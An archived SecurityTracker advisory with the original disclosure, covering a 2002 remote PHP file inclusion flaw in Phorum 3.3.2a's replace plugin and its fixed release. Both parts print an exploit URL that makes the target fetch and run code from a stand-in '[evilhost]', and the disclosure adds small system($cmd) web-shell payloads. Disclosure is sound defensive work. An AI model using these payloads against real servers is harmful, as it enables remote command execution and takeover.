SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Phorum Vendors:   Phorum.org
Phorum Bulletin Board Software Has PHP Include Bug in 'plugin.php' Lets Remote Users Execute Arbitrary PHP Code and Shell Commands on the Server
SecurityTracker Alert ID:  1004323
SecurityTracker URL:  http://securitytracker.com/id/1004323
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 17 2002
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.3.2a
Description:   A vulnerability was reported in the Phorum bulletin board software. A remote user can include arbitrary PHP scripts to execute arbitrary scripts and shell commands on the server.

The vulnerability reportedly resides in the './plugin/replace/plugin.php' script. The script uses an include statement that allows a remote user to specify an include file located on a remote server:

include("$PHORUM[settings_dir]/replace.php");

So, the remote user can use the following type of URL to cause the server to execute a command (in this case, the 'ls' directory listing command):

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

With this command, the target host will retrieve the file http://[evilhost]/replace.php and execute it.

Impact:   A remote user can execute arbitrary PHP code and shell commands on the system.
Solution:   The vendor has released a fixed version (3.3.2b3), available at:

http://www.phorum.org/

Vendor URL:  www.phorum.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  Phorum 3.3.2a remote command execution


Target:
Phorum 3.3.2a (prior versions?)

Description:
In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
include external php scripts and execute arbitary code.

Found by:
Markus Arndt<markus-arndt@web.de>

Vendor:
http://www.phorum.org

Notified Vendor:
Yes, already fixed version available

Details:

After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
I just snooped around a bit and found this file vulnerable for remote script inclusion:

./plugin/replace/plugin.php

let's see some code:



	<?php
	include("$PHORUM[settings_dir]/replace.php");

	function mod_replace_read_body ($body) {
	  global $pluginreplace;
	  reset($pluginreplace);
	  while(list($key,$val) = each($pluginreplace)) {
	    $body = str_replace($key,$val,$body);
	  }
	  return $body;
	}

	$plugins["read_body"]["mod_replace"]="mod_replace_read_body";

	?>


Easy one..

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

This one will get the file http://[evilhost]/replace.php and execute it.
If [evilhost] has php enabled we could use this one as replace.php:

	<?
	echo("<?
	system(\"\$cmd\");
	?>");
	?>

If it's not php-enabled simply:
	<?
	system("$cmd");
	?>




Markus Arndt<markus-arndt@web.de>
http://skka.de
________________________________________________________________
Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr! 
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC